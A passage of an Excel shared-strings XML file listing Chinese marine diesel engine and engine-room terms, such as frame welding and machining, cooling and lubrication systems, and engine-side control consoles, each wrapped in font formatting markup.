        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>击穿阀张紧工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机仓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机仓吊车能力</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机舱吊车</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机舱吊车</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机舱工具放置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机舱海水冷却</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机舱滑油冷却油数据</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机舱空间布置要求</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机舱空间要求</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机舱空冷器清洁系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机舱排烟系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机舱汽缸润滑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机舱燃油系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机舱扫气空气系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机舱扫气箱灭火系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机舱水套冷却</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机舱凸轮轴润滑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机舱外部管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机舱悬臂吊高度</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机舱压缩空气系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机舱支撑布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机舱中央冷却水冷却</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机舱轴接地系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机舱轴系</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机舱主机数据</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机舱主机座</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机侧控制台</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机侧控制台详图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机电一体化喷射控制系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机加工尺寸建议</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标记</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链条</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸单元</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架，附件</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架部分拆卸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架部件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架操纵侧管系</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架侧</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架大门</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架大门</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前方</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架单片焊接图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架的主尺寸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架吊具附件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架对接侧</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架盖板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架盖与阀件的安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架割板方案</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架工艺过程卡</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架供货图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架管路</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架焊接说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架焊接余量</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架后侧</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架后大门</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架后端</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后端</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架后端焊接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架后端加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架建议书</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架联接侧</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架明细</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架内滑油</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架剖面图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架前端焊接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架前端加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架切板方案</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架切割方案及板材清单</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架清洗</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架区域清洗</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架首端加工图</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架下部</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架下料图</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架形状和位置公差</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架支撑布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架支撑夹具</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架质量规程</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架质量控制</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架中部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架中部后端机加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架中部前端机加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架中段后端</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架中段加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架中段前端</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架主要尺寸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架总成后端</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架总成前端</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机旁操纵台控制停车，启动，前进，后退</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机旁监测</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机旁控制台控制停车，启动</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机旁仪器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机器接口组件布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
